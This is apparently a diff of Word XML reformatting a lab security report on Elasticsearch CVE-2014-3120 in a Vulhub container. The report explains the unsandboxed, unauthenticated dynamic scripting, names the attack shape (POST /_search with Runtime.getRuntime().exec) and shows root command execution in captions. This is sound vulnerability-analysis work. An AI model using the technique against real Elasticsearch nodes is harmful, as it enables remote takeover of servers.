-        <w:t>[[SCREENSHOT: sast job log – "No issues identified"]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: sast job log – "No issues identified"</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>[[SCREENSHOT: sca job log – "No known vulnerabilities found"]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: sca job log – "No known vulnerabilities found"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2935,6 +2796,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2947,6 +2811,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -2961,6 +2828,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2977,6 +2847,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -2994,6 +2867,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3010,6 +2886,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3027,6 +2906,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3043,6 +2925,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3060,6 +2945,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3076,6 +2964,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3107,6 +2998,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3123,6 +3017,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3140,6 +3037,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3156,6 +3056,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3173,6 +3076,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3189,6 +3095,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3206,6 +3115,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3222,6 +3134,9 @@
             <w:tcW w:type="dxa" w:w="4677"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="40" w:before="40"/>
+            </w:pPr>
             <w:r/>
             <w:r>
               <w:rPr>
@@ -3245,135 +3160,71 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Elasticsearch exposes a scripting subsystem: a search request may carry a</w:t>
+        <w:t xml:space="preserve">Elasticsearch exposes a scripting subsystem: a search request may carry a script, and the node compiles and evaluates it inside its own JVM. Before 1.2 the default configuration allowed this for </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>every</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> request, with no sandbox and no authentication, so one unauthenticated </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>POST /_search</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> containing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>java.lang.Runtime.getRuntime().exec(...)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> runs a command as the user that started the node — root, in the official image.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>script, and the node compiles and evaluates it inside its own JVM. Before 1.2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">the default configuration allowed this for </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>every</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> request, with no sandbox</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">and no authentication, so one unauthenticated </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>POST /_search</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> containing</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>java.lang.Runtime.getRuntime().exec(...)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> runs a command as the user that</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>started the node — root, in the official image.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>The Vulhub environment for this CVE is exactly that default: a single</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">The Vulhub environment for this CVE is exactly that default: a single </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
@@ -3405,7 +3256,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3519,7 +3370,7 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3577,68 +3428,38 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Both requests were executed against the running container on this machine; the</w:t>
+        <w:t xml:space="preserve">Both requests were executed against the running container on this machine; the exact responses are in </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>reports/cve-2014-3120-all.log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">exact responses are in </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>reports/cve-2014-3120-all.log</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[[SCREENSHOT: terminal – curl _search returning UNIXProcess + </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>uid=0(root)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> inside the container]]</w:t>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="808080"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>Screenshot: terminal – curl _search returning UNIXProcess + `uid=0(root)` inside the container</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3657,383 +3478,237 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>Elasticsearch's scripting feature lets a query compute values on the server.</w:t>
+        <w:t>Elasticsearch's scripting feature lets a query compute values on the server. The design intent was convenience ("score boost", "script fields"); the security model was that the node is trusted and the client is not — except nothing enforced that.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Dangerous default.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>script.disable_dynamic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> defaulted to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before 1.2, so any script in a request body was compiled and executed. The only barrier between an attacker and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Runtime.getRuntime()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> was the JSON parser.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>2.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>No sandbox.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> In 1.0/1.1 the MVEL expression is evaluated with full Java reflection available. A scripting engine without a class filter is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>eval()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for Java; the language choice (MVEL, then Groovy) changes nothing.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>3.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>No authentication.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Elasticsearch 1.x has no users, roles or TLS, and the image binds </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>0.0.0.0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. The CVSS vector lists </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>PR:L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> because the vendor treats the API as privileged; on the network there is no credential at all, which is why the effective attack is pre-auth RCE.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>4.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Blast radius.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The node runs as root in this image, so the first command already has full control: read the data directory, reach the network, or exhaust the heap.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>The design intent was convenience ("score boost", "script fields"); the</w:t>
+        <w:t>The defect is therefore an access-control failure around a dangerous capability (CWE-284): code evaluation was treated as an ordinary data field. Every later fix is a way of taking that capability away from the client.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>security model was that the node is trusted and the client is not — except</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>nothing enforced that.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Dangerous default.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>script.disable_dynamic</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> defaulted to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>false</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> before</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>1.2, so any script in a request body was compiled and executed. The only</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">barrier between an attacker and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Runtime.getRuntime()</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> was the JSON parser.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>No sandbox.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> In 1.0/1.1 the MVEL expression is evaluated with full Java</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">reflection available. A scripting engine without a class filter is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>eval()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>for Java; the language choice (MVEL, then Groovy) changes nothing.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>No authentication.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Elasticsearch 1.x has no users, roles or TLS, and the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">image binds </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>0.0.0.0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. The CVSS vector lists </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>PR:L</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
